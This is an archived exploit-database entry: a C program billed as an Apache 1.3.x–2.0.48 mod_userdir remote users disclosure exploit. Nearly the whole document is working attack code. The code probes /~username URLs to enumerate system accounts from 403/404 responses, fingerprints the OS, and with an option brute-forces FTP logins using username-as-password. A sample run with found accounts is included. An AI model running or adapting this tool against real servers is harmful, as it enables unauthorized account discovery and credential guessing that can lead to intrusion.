Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure

EDB-ID:

132

CVE:



Author:

m00

Type:

remote


Platform:

Linux

Date:

2003-12-06


/* m00-apache-w00t.c
*
* Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
* ~ Proof-of-Concept edition ~
*
* This tool scans remote hosts with httpd (apache) and disclosure information
* about existens users accounts via wrong default configuration of mod_userdir
* (default apache module). Then attempts to log on ftp with found logins.
*
* Works only against Linux and *BSD boxes.
* Info: http://archives.neohapsis.com/archives/vuln-dev/2000-q3/0065.html
* This is old, but curentlly still actual problem, because 99% of all admins use
* default configuration of apache http server.
*
* This tool scans remote hosts with httpd (apache) and disclosure information 
* about existens users accounts via wrong default configuration of mod_userdir 
* (default apache module). Then attempts to log on ftp with found logins.
* 
* -d4rkgr3y
*
* sh-2.05b$ ./m00-apache-w00t -t localhost -u test_userlist.txt -b
* 
* [*] Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
* 
* [*] Checking http server [localhost:80]...
* Apache => yes
* Vulnerable => yes
* OS => Mandrake Linux
* [*] Searching for system accounts...
* sergey =>
* m00 =>
* satan => yes
* evil =>
* poison =>
* god =>
* guest =>
* dima =>
* ftp => yes
* vasya =>
* rst =>
* vasi =>
* [*] Searching complete.
* 12 users checked
* 2 users found
* [*] Attempting to log on ftp with login:login...
* satan:satan => no
* ftp:ftp => no
* [*] Complete.
* 0 ftp accounts found
* 
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

#define DEFAULT_HTTP_PORT 80
#define DEFAULT_FTP_PORT 21

int m00() {
printf("\n[*] Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.\n\n");
printf("\n[*] Downloaded on www.K-OTIK.com\n\n");
}

int verbose(char *d) {
printf("+-----------------------o0o-----------------------+\n");
printf("\n%s",d);
printf("+-----------------------o0o-----------------------+\n");
}

int usage(char *xplname) {
printf("[~] usage: %s -t <host> -u <userlist> [options]\n\n",xplname);
printf("Options:\n");
printf("-p <port> - http port [80]\n");
printf("-l <log_file> - log all attempts to file\n");
printf("-b - try to log on ftp with guessed logins (public version only login:login)\n");
printf("-h - usage\n");
printf("\n");
exit(0);
}

int attempt(char *argv);

int conn(char *ip, unsigned short port) {
struct hostent *hs;
struct sockaddr_in sock;
int sockfd;
bzero(&sock, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if ((sock.sin_addr.s_addr=inet_addr(ip))==-1) {
if ((hs=gethostbyname(ip))==NULL) {
perror("[-] Error"); exit(0);
}
sock.sin_family = hs->h_addrtype;
memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("[-] Error"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
perror("[-] Error "); exit(0);
}
return(sockfd);
}


int main(int argc, char *argv[]) {
FILE *userlist, *logfile;
char *file=NULL;
char *lfile=NULL;
char *host=NULL;
char buf[0x20], check[0x20], request[0xc8], answer[0x3e8], c,logd[0x30];
int i,hand,x,f,v=0,brute=0;
int port = DEFAULT_HTTP_PORT;
int fport = DEFAULT_FTP_PORT;

char c200[0x05] =
"\x20\x32\x30\x30\x20";
char c403[0x0e] =
"\x34\x30\x33\x20\x46\x6f"
"\x72\x62\x69\x64\x64\x65\x6e";
char c404[0x0e] =
"\x34\x30\x34\x20\x4e\x6f\x74"
"\x20\x46\x6f\x75\x6e\x64";
char signature[0x0f] =
"\x53\x65\x72\x76\x65\x72\x3a"
"\x20\x41\x70\x61\x63\x68\x65";
char *http =
"Accept: */*\r\n"
"Accept-Language: en-us,en;q=0.5\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"User-Agent: m00-apache-finger\r\n"
"Connection: close\r\n\r\n";
char **logz;

m00();

if(argc<2) usage(argv[0]);
while((c = getopt(argc, argv, "t:u:hp:vbl:"))!= EOF) {
switch (c) {
case 't':
host=optarg;
break;
case 'u':
file=optarg;
break;
case 'p':
port=atoi(optarg);
break;
case 'l':
lfile=optarg;
break;
case 'b':
brute=1;
break;
case 'v':
v=1;
break;
case 'h':
usage(argv[0]);
return 1;
default:
usage(argv[0]);
return 1;
}
}

if(host==NULL) { usage(argv[0]); }
if(file==NULL) { usage(argv[0]); }

if(lfile && (logfile = fopen(lfile, "a")) == 0) {
printf("[-] unable to open logfile [%s]\n",lfile);
exit(0);
}

if((userlist = fopen(file, "r")) == 0) {
printf("[-] unable to open userlist [%s]\n",file);
exit(0);
}

logz = (char **)malloc(0x666);

printf("[*] Checking http server [%s:%i]...\n",host,port);

hand = conn(host,port);
sprintf(request,"HEAD /~root HTTP/1.1\r\nHost: %s\r\n%s",host,http);

write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);

if(v) verbose(answer);

printf(" Apache => ");
if(!strstr(answer,signature)) { printf(" no\n Vulnerable => "); } else printf(" yes\n Vulnerable => ");
if(!strstr(answer,c403)) { printf("no\n[-] Exiting...\n"); exit(0); } else printf("yes\n");
close(hand);

hand = conn(host,port);
sprintf(request,"HEAD /~toor HTTP/1.1\r\nHost: %s\r\n%s",host,http);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);

if(v) verbose(answer);

printf(" OS => ");
if(strstr(answer,c403)) { printf("FreeBSD"); } else {
if(strstr(answer,"Unix")) printf("Unix unknow");
if(strstr(answer,"Debian")) printf("Debian Linux");
if(strstr(answer,"RedHat")) printf("RedHat Linux");
if(strstr(answer,"mdk")) printf("Mandrake Linux");
}
close(hand);

printf("\n[*] Searching for system accounts...");

if(lfile) {
sprintf(logd,"Host: %s\nFound accounts:\n",host);
fprintf(logfile,logd);
}

x=0;
f=0;
while (1) {
fgets(buf, 32, userlist);
if (buf[0] == '\n' || strstr(check,buf)) break;
strcpy(check,buf);
buf[strlen(buf)-1] = '\0';
x++;

printf("\n %s \t=> ",buf);


hand = conn(host,port);
sprintf(request,"HEAD /~%s HTTP/1.1\r\nHost: %s\r\n%s",buf,host,http);

write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);

if(v) verbose(answer);

if(!strstr(answer,c404)) {
printf(" yes",buf);
if(lfile) {
sprintf(logd,"%s\n",buf);
fprintf(logfile,logd);
}
logz[f] = (char *)malloc(strlen(buf));
memcpy(logz[f],buf,strlen(buf));
memset(logz[f]+strlen(buf),0x0,1);
f++;
}
close(hand);
}
fclose(userlist);
printf("\n[*] Searching complete.\n");
printf(" %i users checked\n %i users found\n",x,f);
if(brute && f>0) {
x=0;
i=0;
if(lfile) {
sprintf(logd,"FTP:\n");
fprintf(logfile,logd);
}
printf("[*] Attempting to log on ftp with login:login...\n");
while(x!=f) {
printf(" %s:%s \t=>",logz[x],logz[x]);
hand = conn(host,fport);

sprintf(request,"USER %s\n",logz[x]);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);

sprintf(request,"PASS %s\n",logz[x]);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(strstr(answer,"230")) {
printf(" yes\n");
if(lfile) {
sprintf(logd,"%s:%s\n",logz[x],logz[x]);
fprintf(logfile,logd);
}
i++;
} else printf(" no\n");
close(hand);
x++;
}
printf("[*] Complete.\n");
printf(" %i ftp accounts found\n",i);
}
if(lfile) {
fprintf(logfile,"\n");
fclose(logfile);
}

}
/* m00 */

// milw0rm.com [2003-12-06]